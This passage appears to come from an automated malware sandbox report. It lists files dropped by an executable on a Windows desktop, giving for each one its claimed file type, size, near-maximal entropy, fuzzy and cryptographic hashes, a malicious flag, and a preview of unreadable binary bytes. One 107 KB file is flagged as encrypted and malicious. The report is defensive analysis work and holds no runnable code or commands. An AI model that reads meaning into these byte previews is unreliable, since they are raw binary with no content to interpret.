              Preview:regf.+....K<.W3!....,...;...'..tT....f~..E..5Q....gc/...j..UbN...Q.Up.....og..L..H.m+8Q.OT.._...=.4n.G....!.X.?e.c.bF!A1`[..'Y.'.|..C..eF....'.y....`..bQ.h.%.p......6...`v..w#..P..t.k..._.C....y..?.tm.7I..S%......r.pw........qO.`.}~a.8.O.R...N.....u_.S.N.......r..%....H.....;.2.._ .c#.....t....3%......-.j..]..#...9*+.}.....a..]Z}"..G...~d.v..u...._.6C.5h.d..;.a...3..$..@ .=.o?.e.j..3.O.n.$.^1_.b._Is..lK......ZvZ0..f.........A#j..A.l..q.n..3...:......$...&1_T......%..**.......q.-......G..\+Lx.cd.....m..xc.mn.ZYx.._`....=..D.[-.t..?..I+.G.....T..6dJG...^..'..a.9w.q.H..M..B...ZX[3Y3....4.5.W.(.=...1....U.Z.f;.u.......O...,..B.........QM..9...k{vO.ZH....u..<.WW...=..1......=o',.....h...R..6.T..z..h)@..L.c.[[..[..~v.,.I....{..m....;.F.WkF.Z...T4.....w.Oc..e...K...d..,W.............2..zB'.&..@..7.rt.C.....#..!.....hn.L..O.kO._..o\.,..R=A....Q..z3...(...aD.qr..i..UgFs.1..y...}7...Q..............q.L..\........X..7.6a..9..jT...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977581706290789
              Encrypted:false
              SSDEEP:192:u3l6bnlQtuiy8QDnGQ67SGZRaPjXgohehbw9oz:uKl+PQ7X676jwohf9G
              MD5:DAE53B9D33B9D77C2ED6BD427D8F7089
              SHA1:1AD1E099C7489465CE3E654C3511FB6477EB740C
              SHA-256:7C196BD32A93A142D3A7F17D8735B44CA889205F98F4A25DE7C32C71D79297F0
              SHA-512:060DEC626F30046EF5116AF8E596FB30684901D433740890554F8E24AF34E99E9AE4CE9A493D311D33E5795A4FC3B9EDFADE47A5A9C4A436E7607710724855AC
              Malicious:false
              Preview:regf.....T.....`.p.K..xG.:.4....iRl.....8.K..P...x[.v.7(.[...c.^'&A.....<.....H/.1%)..........+../..l..J._.Q ....L6`....=M..+eI*..%.C...z.......X..'...]..1..).....^.*.&! .B.....\_o.`...L.Y..;.}r]...Rz....7...". 5..*..p.G..(.We.f.....}....-......,?B...0Y..|..=)..V@...q.T.D...#.^....Dx...uN.]\=O..'.sZ..*N|.y..Jv.<E!].Uw....S..H.a.. ..".<....G..z...;9.Y.tvI.y..Iy.,..2.....u........F..P...Y....6.&|....W...%.....Rhsz/.H......i.0.f.#D..62.0.W.v..M...Y.7...-znM)...7......1e.mdX..l.Oig.}<..Y.u...E..aW......1;'.......9..w.9..5=....Z!p........F^.n..x.".3i...B.%..PS.$.....X5.+.T:0y.M.Zw...%.L|.0...Tt.....).'u..fn...+#NJ..B...3.x).......4..h.r..s.....[_(..C..j.......Sf^eCLw...R;ar.QV....._...4.v..<..3&.K...*.J..O.d..h.0....F...lt.........2....[...QN.r.+.......r.y.I...t.b1..9.{D...rX...`.L.........J.;q.h.1..1/].../.#.gyL....=.P...;@.u....kGo.5....../{.~.%..6..8..4P}..'..0......R..c..C+.g......d(......io......?.._.....@...C..>PW-.V..U~E......w.ivl..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97602560867562
              Encrypted:false
              SSDEEP:192:N41D63iohj1E+HxaefokGsHqKWLKBiPAAWGPwxEHaw7kShtlwY:NODQPXRae5GsLW2BsA16VwY
              MD5:671097B0D23DCD042503AB9C43F3C55C
              SHA1:F9EECB7A55597B02FD6CA19D8E1F9B337993BCCE
              SHA-256:FB514ED4A553526D13795F248DD1FC57FE9DDDC2DEDB023DDE5887835A1C5AF4
              SHA-512:742820762A7BB4E85FAD8262360579D065D8978D9CB0752489F0443EF5EB9CCCA88D89EB85360E82106240BD162E96268496893424CA3E375E52B9EFE1D14F86
              Malicious:false
              Preview:regf..._...t....g-.{..W=.%....=.p~.......p.......W...s4.!.".....Hb..@..%....lm...t~Dch^..BWFl..^.t.....Ge...>...d6(~.fIS.q^....Q.... ...@r.x..l..J......Q.!.Q....?..s..UK....Ml....d0x.....H...q.^+....D.....re.._c....s....Y=l.......S.D.....`@.`..l2....)....tQL.d.........3\5.c..`.,.-D.&..x...n.+..u.k.......|.7.2X..T.5.W.A\..45...5..=U....}y......V=v...[..n.u.\.T].6_."..WE.Z>q...x.c........<.8......zg...........{...-.....:@.T.s...@...7.,......d.kF...'^.Nq...p..P$..'4....=......6...k.8.Z.E$.n:...m..c...._s>v........fV...G3n.q.0...~.X.5...5..$"dY>....?=Wi..5I.`..J5CtB.B.t..b9.....y...|...|.....bYI....._..E.z....I...Y.%....P..z...w.kA.=H'..H.e...j_'Y......-5"....~.."....h..1.*l..0M..;.....0 ,....!.p.3..$.A.E.......J..m5."....>.*.K...n-..l_Z....TBJ...d1Onl#.+..yj.?.$..V..5m:u..)..<..b...N...8........J.vy.......P.[.Q=...cX.l..'N9.....E.|..#.o.Y.-....,......kc.eG%B.qd...,.....r..[....S..BuT.)...@.Ulp2=:n.....9...vG.z. .$..8...g%W[.?Ge..._Ul8(...s..B4SD.=
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9763406629109355
              Encrypted:false
              SSDEEP:192:YfsPnG5vDrXo+pYWV3uhOLWgmUVRjDUatGxEVut9hZezyz3ituAcnvLC:YMnorrRh+A0ARjDUp9Guz3ilOvLC
              MD5:35835900EC676AC801147FBEB8A22F60
              SHA1:EB684353A34D49D69BEEC6CA5B14F65F73E1533B
              SHA-256:9A96C1C7A77ACAD72A9E206865AA3E6CDD29DF11835F9F31C4A68C1DEEE0D5B7
              SHA-512:A5ECC7AF847933C74DF7F5614047220CC913F27FBF841A7ABA005A49173EBFC59D77C27E8632AEC703A6FD3C611140A149119755EBC9DD30876E6CC0690355AB
              Malicious:false
              Preview:regf.jlv..........b.T.R.b+.g3..s.."...a.c+.'Y00...MbN> >.7...M-P.#c.G...q|.g@]W..\q......@..U.x..0...@AF.....U.bA..8.B..A>.>...o?:....v..`Ou.M.....\..K.~d......x3.1..oD..[4.....=...M....P..h.I....u/W..q..N.kg.h..Y...yv..e..S..[...W.KB}.B..$..9.......yd.....x.\..Fk.R.#........ V..,..-">.U9.....KDu.ac...ZT.....W.XY.F.Al.....y./.1..:.@.Y......L..m..g....[....q#.k.S.?)[.8..o.h,....T.6X(..2RR'..iO..P..h0...?.._....4$y......a.....<.....F....SQ.P..*.....ZT.;..JM,.X}k............\.4.o....H...R}@.I.1IF..g.F5g>..`.5.>D(Di...jVn...4.3..&.8.. ..V4^7.....L.0....37.......b.\.]rm+TVN...a/.<..a}........O..t...|z..O..O..."o..\.K. ..c..S......7OO....}3.p..(..9....*..8...6.-U...sm......f.......?.b6..5..r..tAgW^..(..4..dh.Pv.......g."..l...6A..._jy)...(;./w._t..,|jBi<.B?..^.+....,..bL.x.>.L.......=7.\.r.J.IP'.m.W\...B.......S<dX..p..'s~...M.O.7i.....S..O.]Nc..0...q..E..Cl.M...Z..>.6..t3..Ld.....q.'.<E.7...c..n.x...|J....Z.?.).>.....O.}.........
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976141274461673
              Encrypted:false
              SSDEEP:192:Yhxy+1NiblexvlzjvKhHw29XKBtG5wCJVceDu2o+XpeyuCGqiD3GkjO0AEJJBKM:Yhx/CgxxvuwgCG5w8vdXp/iCGAEr
              MD5:1EBFF0D1011D8E09167690C9E6FF5A78
              SHA1:7342F259778A10DDB24AFA570DA86F9E48BA85FD
              SHA-256:F137472EC43D261C3D00C2CADE2E92AD59EE6127F5EA779604F124C5CA78A31F
              SHA-512:D0A80C98754E2C2F1BBAFC2F7A7EA016EFC2773EBE0604299A60F94414D36A1A0F7C8F0476C46FE995F3ED53180998073E8552ED02E721B920D60816764CADA1
              Malicious:false
              Preview:regf....~.4d.h.....8|2=....+...wS..`..v...t.........s...Aj..].F.9.0N.....au.=`e.9.{{p.(....Z..k.....o0.:.%k.i...:..b....._.Y.k.k.-...n.....:....D.5..]..z..p...~...UR.(._94u..w..k.)lN.9..Z...P.v.......v...=..x.@..w...t..D./.....N.).f.w.B.....V.{{.M..:.8....V..u...6....Q...=..V.Wg0................8..8$..z{s..WlR./....5...r....8..?..m...f.5Kg...<.c......:..r.o.N.......4._.H5?..i..@T.<Mo.{...E.00.p..8.t..KP.&..N... e...w15..|....^.....Q|..O9+..J../..5?...g"....@.L.:...U.x.^..(.>....|s.a.8..S.fW.p...Z..kDM..vo..$ @...K.!.p2".pql.....|...IC?.B.[._S...l.....S.!.,..VB/|........;HsX..1*N'U...cK.$b.G..WI.w.tw..c..p.`...Gx1.'..?.8.l.I.9:.....F............E...V~.536.0.....l. ...6...{;.@I.[;s.(D.G..X...^....)..l...G.7....@...T..B....2.o7h.mt...q.z.(.I.".[.......[j....g.1"....J=..{.E....._..K@*.........3.p....<..F...|..@4....T........OI.\\....[.....,...<..m..[.tq.....1.*........u).].cnl..E..]..J...([.^.....&k(..Sd..(./..@c.(.....[....z..?......
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):107523
              Entropy (8bit):7.998297101991242
              Encrypted:true
              SSDEEP:1536:IvLn+21UmwWs8+lUtxfeep0Erb4oVqVWhCWRtEjeyUt4AizcAK38Tja25cS62A5u:ITZ+8Ko3088oGWhC8tEjedi05372al8
              MD5:4D3F2260009A3579CDA61FFC97C7DB92
              SHA1:8EBB4B5A425AB07ACA4559DF118BF7EB3DEFC842
              SHA-256:6A9DA30C4CDB4BC0688119A6C73D973D2463A668D4369C7F808B445FC6B8FD8E
              SHA-512:BBB7490DC43D3BD21D17B8B349B74EDADD0726098B8511FA6E10372E69F18C58DF701E8EF74BB056425694C4EECC5FA14C0CDC99911C7AD0EFD011ED91F4A8EA
              Malicious:true
              Preview:<!docE}@......J....J.K:.....H..d.E...o.;.+9.=..Z...t....t......W.K...|%..E..M$...`%$.k&...9...AVO1.y..;...z...u....{(....S.}{...&-A...C......C3+n...bMNY..n.xDJ..]...yQX...w.s_.7H)V}..DB.8.%]#.B1.!..{T...@h.y...X.]..._.v....(n>....jc. ......U..].'..Zvz..V.I"(m..k...y...%..S.o.]...Z$.....{........H..S;8...<X.....?.0...z&:E.Hr...1.g.Z..^^W.G%.8..."..k.]..sY......x.q..{g!. .j....e.H.=+c.AW3.W?..}..*T..xl...}...O].~..\.....^.3...=......^/..;V@.n<:..k....BZ.....@.8....z.O..F..za..v....b.*..w..eg.M..P..C..5A..%9.V..6>...z{..>..3/...{|DYB.a.........#,./.......Z}I;./.(".7HCc....=..l~%W....Q.H%:5...]3#.....7.,y....8.6u.)!.......% ....N....81f.(......%...................U..~E..S.....*....A.Sc...&H.gR..7......q.#+.5.U..nu/V.C.A..w..q....N...B.P.t...d......Cqh._..SW8..X?.. ..X.K..oSy..,$5.i\.&.uA.'O.v..x...>..%.FO........t,..B9.....-....vP...F....w...V.x._.O.......U......?...L....X.2......D....AE.t...=.Mq+Q..i< ..y..W...ut....&.%zL%+....c.k..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980699219579476
              Encrypted:false
              SSDEEP:192:6gp6nj3z+ri/D3X1JyAM/Y+fHL+HljOfmLsnGVyqJ:6gcLze0zX1JygHHljOesGVyqJ
              MD5:09B6F3C3DD421FE437B44132B0C44798
              SHA1:1BAA9B6A20B936341557354BB877EB182B40F44F
              SHA-256:1FEB233B19B923E867BD61D2F3BCD92B36E60834B9EACACAB8D8A2087D0C41E8
              SHA-512:EE2639DC912563A6BE940A0B7F220EA8D1EDC503AC8218175028F8CDF2B42BC8A7077F96817CFFD323809AD97E7401F40A327DA3C2186195930042D02C1F0513
              Malicious:false
              Preview:regf...*.....'...qK%..%B..#%".:.2<HQmcN1A.bA6.....+#...j..,_.......p....ZN..A&*m..#...c..q...4$.........?..V..smp<B.>F...}..X.H....T.Z.....P0.u.?....{...........H...C..I...fw+.,.N.t#.........]...x..$....=H+..0....r..3.oL.A....y..i....q....X3GL.g*..}...N.~..Y.Ax.....-d....Y..A..}p.Z.....<../:!....H..l2.4&,Y...Ppq.V...Q$.5.fm.C.....Y?...6...J0....B......q..[.Y.:C..@..t.B..Y....u$D.j)K.....H..U...].....9...".Uy;2Y...s...W.?...i..a.Q.P..(.......Gj/.f.......3.Q...&./...X..'........./Jj...,4'.C.d..F..do.C.....P....P.'.............17`..Hx..!....1.....aLS......U......]n.Z..B...&t..[Bfm.pl.{9.3.%).aU..[........7.*paX....N$z'U..^.6.....4F...7.%.....>.$.o<\v.-.......eE.....f..8.....zGq......O....[PD.,DA/!.;.![...v....M|...X...C.N..}$V....+..6_..d.ma..m+q..,......3..$Y.8!...+.T.^.c.a.-.j...&ML.....E-7.j...w.;#P!.GV[,Yb..2V.BQ6.dL.p.g.Y.Lq.:..D....n....!.*sfd.;...T...?..>.Z.v.~_...t..f..!Q_...l..o..ARR..r.........J.z]....7._V....I.f..!.M.!..i0......vj...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979394180215656
              Encrypted:false
              SSDEEP:192:TZC/+8P9zO/0hAWtjH38RmIkeYFywPMv5MD7Wllu97VL+NDz:Ts+8P9zO/DSInkBF7PMRS7V7YNX
              MD5:9A79CC1551AAD94E11AD532AAA6C0FCC
              SHA1:592CD07509EDC9A7439A3E2AD212F30A1725777F
              SHA-256:21F7A85385E888999D3EBE64A62F3691932B6DDE6774A70497D88B73155A130C
              SHA-512:383C864E80716920F4C121D86098890CB7229B23A546D79D332AEAE560FAD2104C0CBFDA77259DBAEB734B458043242458B9E6B99AB29B4BEA329469778FDDEB
              Malicious:false
              Preview:regf...6...).....{.....,O...[."..].....H.1..g.........+)...;M....6:...h`^..X6;.L.[9.wa...K..m.....B.7S..s.?.`8...g.Y.Z%.B..Q..k...:Z..:T%'O[].........}6).&\\........k.....9.]..z.?...=*.J..t.,@.........}A..)..m.e.=H...|3*J.....~}...a....^.).<.)..z].jK)x....q.<pL..z..a...8~=...N...ZXK.r.h.&......t.,..JkNZ.5..*.b$H..R.kv..HcQ.....Z.._E..eCE&....m 8?.....>.@y....OH.....Pi.{....'............Z..[..StH. ..:...c..O......(.&..Bi.H.c...i-|[.Mb...I%)c..(.p.....H...)..M.B.t..l.6~&..h./..B.g.....,..YH...P...A../...o..H.i8.E.x+..f....a]..9.s.9.kw...7U....O.dl..5.75+doR...o5~...`.1U..U..m{.....n........M....8.?v..<Si..^..m.C.AWA.i.a....~..'0.D.4-......=.E..A..W.O.z1......\..1...7.9...O..d...zd....%....y..?KYH....(.n.4}y.J=e'B.>..b.....KR..`"z..?...8........jU.X.h:h.C!...JI.H..4D..K.Q.....%.b..`e..)s.b.!.......lG...Y..Q....kGiD.#.J<..;....zQ6.......UZs..s..[...'.F`=.}..".<..6+.A...q....z7]..$ec......6...=x.<......e.6...|a.(...r..?.....1_T..-t'.9.]...X
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974738527132242
              Encrypted:false
              SSDEEP:192:85O8w8t2LsrF5v6fMhiEz/0YpNvNq0o1IZbeiSgH9yYdCiZqZFOr5l8EZmooz:85PvALsRBsMv/zx4YmgdPtPr5lF/oz
              MD5:6BB2C11DBE22229E79400C793C530F3D
              SHA1:3408648B2E8CC05F4DAD9CA367501C1A7800B393
              SHA-256:3BB672BE7794DA303777480283386E6407BB05EDBD1EBDB8A368CD38DE32954E
              SHA-512:5799804BAD29D4C3C8DB4E7AE48F20775B04D8341D6BB9F63E8BB0DA02D77A992F351B123F897E2FCBF5B9EE3B71FB500D87253923705F38BBCEDA7A84D6DE7D
              Malicious:false
              Preview:regf....r..u.uzv!.k..D.;..lu7..(..............;..+...N....N.._.....h..e.i....../....c{#.".|t...N....A.&.+H..n4........g}R...?Kt.......w.q.Y@....!.v...[.........l.Rg.\.4.......X.....t.\.Y.W.9;.......Q.4y.......U.@........4...R.MM..{4....A.I...YZ.2s........@....n5:.....B?z....0.^.....60.....%4E....5..`...a...)u..z.(...=j.C..J...1...$......k..5_..u..a.p...N..}..IO4..H..e.:...5.a.].(.ux.Ln.......5.eKVH.)E.{....{.`M.Uy........S.%X..{.@V.H....x.....^...-5P2.z....+:....^...6..a...t:...0.d/pzcb.H...R*....]...."h._.0}Z".....'_..]....n.8.%c..]....i8.. >.......R......1..;.......r..A.3.. .HV...'.W.V.d..|.|....C...7. .:...PeI..z.M.L....r.V....z.. .7.h...X$9T.>.,. .X......dDyf..L>E...i...L.eu..l..:\C...JC"O.,Lm.... .._.........|.p..B.........QvA....I4o'...X....K.^C"..a}_.._....!...C%Enr....C..GR.r)&06.G(()..0@^`u$...!n...U.X4.x..g?........a...HI....P.....Q%#!..*..R.R*x.y;L-.S... 8..$...g...|=..pq).(....N.]..R..S.............V........M..gA$3..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.975071296237989
              Encrypted:false
              SSDEEP:192:5QZzJJ3etP185FAjA31V54eHdhppZFKiVZcpL:6JJ+1VjA3X5F9XF5VZcpL
              MD5:B1CE1A9126C2DAE9B044C3C84B01267E
              SHA1:7D99DBE43F2C97722AED2377121605535E56F315
              SHA-256:82AAF82B1FC4D752DCA54B2A560390709B1B9FE74E81E6F7BDBE44FC8A95C712
              SHA-512:0038FD40157B92284758E0C747DB59E7241884FABAD40471D93D4F35E97AE87955A22AD9EE8AB2CE64D5EB71BBFEEF99036652AC0A96A35D91C201F7A91EE346
              Malicious:false
              Preview:regf...c?.....;.=..>s...x.1....<.I..h.pO...*`8...]U..X..M..^.m=R.fY|......z.cj.5.s...8..{r....4...c..k....A.....O..../...].-.9...$.O..Yp.W..d.T...Lt......'.3_{%.O..&......z...w.e....>.]...l.y....aJ&..oJqC..H.Y*d..b.!...#...*..m,#L.PU"').R.;...-.....J>~...?.~..9..1q..^...32..&K]..a.|...f.....*.....Y....A-:.(...$...k.>.E..>{.h..Y[1../...L<r.tgu...r...-mwF..d'........4R.....z..g......1(..).`....*..p..a.[.].X!.A.........T.i....l. .k..?...c......@..../.9.HU>g.....t..<..=..?..a.8.....Lm........{5[9....=9......).X...>..(...@..0..D....'n.h.H{..~.:.B..E.....|..].Ak.B........z.i..e.>.kmI$&.H..m%.P>..CE..U f.:Q..s.....,.*..."IrD^P)8/A,#.zM...z..>..o...d...o..5<......M_...I...C2!.:....#5!..y.T..q..@.....pV...Mo.......;D...=....K.S..E.T.<#%..@....b@.%{....h...@.,.F....kx..3V...(...8.{6O=.p-.....w....[[w.s....g.B`PA.....dbh...m..hN...M....f....Y.]n.....#A.o....?....D.:8D......5!`j..........|O..H......tP.. r....1..p.....R..~v.6.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979312964965059
              Encrypted:false
              SSDEEP:192:fY11fzaX9+qWLBGnFVehxsqmDVTlW+eE2tpDaArUYJsJYVWRO:w1h+N+qWLArUxXYC+eE2b2GJ1aO
              MD5:A54BCCFFACD722B3A4603700095252A1
              SHA1:C0CAC2C0183051A04EEE2C7E486B805AE215EE1C
              SHA-256:DDCB92DE46356502BA9DC55E85CF00CEAAEE627B3DE3F5602CDAB69D188BF389
              SHA-512:B6248E325FDE2CC3FC48560C3567E4A397152251A5B109035A1D7F9904CDD8EA918BA771E90787963321604059FE1B58BAAFBC28618930A0E91CD2A741C2B048
              Malicious:false
              Preview:regf..%...!..;lZ....z:........F@.$....c.>.S.k...Z....P..M).n;EN.7:%......Z1.w.T...Y..1...Eq.l.Z...O..."a..W..U..{U[....6.0S"+2......|...5......K.....7Y....9.7.Y=Nh.h.K.A.[.pz0H..j..8..lF_..7...b...E...g@.;x.T3..H.$_...r.....2+..G_a...G+.._s.=..g.z..RV...q7.5.A.h.k....v.d.>.x..H..Z..b..@..:pg..........Ou.x5vkZTT.-.YTO........d6..I.......vx...T....-co...W..c...0..........<.......@..K..;g.;.Z..4.[C` .LE.v~....Qr.j...ov.....1..?.....M.S..?X$.#.%..l....5z`...mb..y.2&.....1.I.{..:..Pe'...O.bu.. ......Y9.....D.?}..1.d....PO6.<[....Ib.+}s..uz....#t..HF|C.8.......ci..g...VJN1.K.u.q.q.bm3......\.u.'d/.s<...xv.j..E:.0.]h.....m........u..=ou.bZ.[E.....~3>8..1..+..!m..s.p..<......L....4....oo....C......._t.....^..tQ....EO.F.+.Y.C8.....Kv.d...|.>w....Z`...(b..{.6...#T._.w./z..]....a.....T5....*.b..\....2.}...X..3..iW.;.._.:....l..'o.}.]3.DB.$iM. B...n. ...PP.r.3.0.'3.UJ.4.....~F.z.4P...r~&.....uw^...I...Z..?.b..(..8..a.O..G.".AI..~.lY..-.=K.=.8
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978352029455497
              Encrypted:false
              SSDEEP:192:jUtjHAIMwC5UOs/3g8s8IwsluHfrVjaVrWS2po2+zYi9Q:YtrAIc5UOs/38bGDVjrxO2yYT
              MD5:D0512712B969FA97D0C83351E9E5BC29
              SHA1:3D8D2E97426AA2D4C2D93A0816E23CEE8ECEAC54
              SHA-256:70E4B9B5C5231C760ECA6C8669B2F2A276319856A3BD18EF74293D33FFE02EF7
              SHA-512:BADBDD51A1530DBD5BCBFD8128517269CEE42C66C884258A784899D0826F88079A39CB3E22F0F9EC5F25A5E0B5B2E875C198D3BB58BFC284241F2FE595976C8D
              Malicious:false
              Preview:regf...c.iN7q=...R..g...S!..f{.....-f.j.$.o.p..eBV=.2~.MOSQ.....0.|.x..]..).o`-....&@...C..P.B.(....,X.+y..~R.lU...C..#p..(}O..(x....~.a..P.(y..#.N..n..v`.........X...t.\...Y'.+Zc........I.D?u.L..&L.$....G....Y.[9`l.o.s.g.0&t.8..)3....5Y=.i.[..7.3.`.)..J..."..C...U.3..L. )p._C4eN2............q"..a'MT...F......}....lx...f+........*.,Q.<.Bo....... ...7..~&;5.G..,..;../O.....P..]...j....G.mt".O..d....zT.3.....kI?= ......O..1.~....6sl.N..Nw.........7X..F.(R.../..qH.'....r..Q.*......`......vi.x.<...yyK.:o.q...,YC.jV.]GKI(.p.D..sssy..z.....^H......4..m?...6-..{|....0..,C.?.W.!..L....]........z.M,.3.4.rqxc...(Z....X...:5q...7.<...m..)...'-EMu.{..r.1*..qd...sH.O.`*G[....XNFg.G.D..8.K....N..s.".r..l.)..L.lN...mO...{ck2..M%q.U7.).yU&..I&..}.H...>...M.K..7.....^....N.1#.GXNJ?.."......./....P....=..y.>.~..c..g....@9+.....i..usp.S..WYHv{.51,.".q...wc..(.T..r5...`..._..=._.7cp...`~.vdL.v..}.R.....}.)m.....j.'CM.L......%4.....JXW..3.......db0i`..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977566276909876
              Encrypted:false
              SSDEEP:192:eKVULuiOPCLZ/RqsnwLlElI9Py/CIsTSJ:etW6LDqswqlI9Pqfs6
              MD5:BC9801DDC885D1685DAE08CE848F57DB
              SHA1:1488B3712EDB635503C5765382FD915C30DC9C7C
              SHA-256:37D764784CAB9E419418F8FF628A15832AB2E23E0B6A074BDEB7330348443C8E
              SHA-512:9701A7973F63E13CAE55B878B751988A76BED0DFCE2E0819FD126D2278533A1A85C5F580CE3D0942EFCF31FF17AF63B0B271BF0DF1CB76C00BEEBF7A17FD7E96
              Malicious:false
              Preview:regf...~. .o....4._..&.T..b.....i...ya_<..Z..D%...N..Wc....g.....>.....9.H.. ..S...}y.....H.EAf#?..Y.d.....,j..=l&d....lE.%A......vn7dO...78Gc.pdS....W.`X..#..3..R.3.>.,.g.._{.d.i._....4..n..k.-......h...........}.|(`.QO..._.:E.....#...5..&..<..5.1... .."...U.k....Nm.!..E....C_Wt|...^......mBW..F...c.wm.?A..?..C4B..;..9.#w.*w._.5..TS..Vw..0#.}.^n1<..i.%,.w}....M.....4.. ?j......t->L+.r....U8h*c..Z..:...A....aY....p4.\&.<......]...-......M......w....W"......z....|...)~..PT#.:....mqL?.5.&..Q....XV.BL.`..3....Z\[.._N...X.u....9.#...(.r.....(<b....|.5.w..f.r$I.......B.dQf)#u....+b.....E......-^<7.L.|..0P..h..N..W:}l^..~m.=$.W.;.....s...WP.:".? ...F.k..&...'F.`.5A.C..ea|V6....7UD..8..aY@r...#......I.y;.5.].uxN...(LD..,..../.S_..%.A...M.."2.W7...U.p2A....qB..S5.....<.>.h.WM.2.......z........Yw........<..y..@).?...a..X...M.."'V0$:..m....j.K~...|k.".....t..rCp...../H....F/.......v........E.O.L<...bo....8].:.e...Tb.......-%X......j..EN..Xo-
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977241578897203
              Encrypted:false
              SSDEEP:192:648olTugEwtmhm2Eep95aOnRXZ9AsevqrmjR38YznFMhl02uOiyTKq:648aT7tH2Eep9UOnFZUP8YbFMLuO7Oq
              MD5:5C969E8F47B5331F1AA0DA6F7913AFC7
              SHA1:D8BB9FF340A1F945EE9A8451CC39AE96E19E76BD
              SHA-256:D38AED7E095FA4CCD476C212E1D93F0D13395C5E1C92D406093BB07A7534D99D
              SHA-512:E03C012CF3F6236D7ED62BBB55595ADF5AAE6D3A5E96398AB31D7B462A5CE9CC37556518CEF865632E7ED06602A46F5A023D1A9109581FDA23C9AC4BD73C8555
              Malicious:false
              Preview:regf.)2..y0.:J}8<xu#.-8....b.P...k@.......N2:.%*!.m]._..\J.`..J.*..I..+..EK+.......S..I..x......!..X......<.A3..s.."?.8.B._.........#.d.4|p6....D.TR..!g.2..^....O.g.._..:g....I....?..U.. X*.o.t@.zI.j......=../.9`..ib..`y[.z.*.X..Hh&(.A...t6....q.%G..p..."5.9.4%..c.|.....SJ,O.....U.8V.T....N..t$QV.....HEh..{z......L.Y#........a..Q...n.x..?Gz...g.t..q(..Z.m..J...o:....v.J.!7k........s..oE..w.s:=....5w...M.<3a....r............b]h..L.......=.,...T......A..........t.......5O.'.|.sW....8...W....z....Qr;2..j.._...o.V?O..A.P^...&......a..F.5.....x..,..MhGe.O...6/O."-.#.,..'E....-.,}..e..t....@...p.ri.3.h.G.T+..{..~!..-.2.. ..r.......m.;z.....uD.........fjG....Y...}.f..Q..j.H../.Y^.X.q..&.........n.$..&...MOy..M}....t...G;..;.d.....?z.f2k.7...n........E.......n..'.#>[.....-..'.Ir..H.pa..0...7....$.:!R.....f.=@I...]..J.R...}...{v?C(.gR..0..C.../....S.Z..Zu.:|.8d....[.A!d.q]-. X...y2.rC.0#.....=..}n..4..m.-U....t.........6.J..E*lA.)..Mc...[,#U+
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977532665294436
              Encrypted:false
              SSDEEP:192:koRb9btGFtXlSmeujGWYb9EZgp5CeOuNxTrT3gXI7Ry3lJS7viGl:koRp4j8mbj43rXTr9ynSmE
              MD5:18277863009B939A5D948FD4DD44DB43
              SHA1:80A8A25460D3390FA479540C8F3FB7E7C37B9718
              SHA-256:F2E9720B880DFB534CD97649751CA296122859B09E3144B6F218F91B2FA9E85B
              SHA-512:C2263F1EDA87BC5047C937900BB9AD6E02EBAC02EA5F24440E2BC0801201B522236D5EFE8EA370B74CC1BFBB84E913FB9C79EF69397E23B4FFB4808B563A696F
              Malicious:false
              Preview:regf...1.r{;0.%....s....pK*.Wk..U..8....,...a.....0"2Kl}..._...s..}..o.=H.WY=/.2...A..C.....{@..r*.(}2.6..-.{.....?....u-...#.VeS...|9<h0......U......`.v$mL....S......~..%G.....Q....),.z7.[........h...D.....K.-.[(...Iy..5...N...G-.......u..$...8..h.P1.ea..=.y8]....;O.hug..0....b-X.,...T.......b:.U.....v....i...[..x.hx.\..t)`.....:!++a@...C.&.So.xe.j.[.a.&...s.<.....jbI.'..+1.Y*E....*...77........mu..@..x..........-:..+..Y....a...]..S0n.....%...$3.-.>X..K.".~.h.u.F...,...B..t..a~...r...N....Wn.....R.]..1 ..l.....0............To.....P.wE.4VBo.uF...T..jT..........G./..]./.*....y..L8.I..........zh..#..[T....F.l@..E.G.@v-.......8.....*....d...'.f..Uj.B.}...P......wJ..v.<O7....hZ....y.....#A.....RQA...l.l4.].(]..].0.h......T4~'.5...!.E...1....p.0..w......=....].....r.Cj.q.u?...S........=.sp}"d._.o=`n.....K.%kMD..H.P.].4......A;O...<.~2....5...D.5+4.6.##k?...o...A..*.A ..,T..E.t.-L..b.i..?.Sd..].....w..~(!..7..]......aM../L...N4..|......\9
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
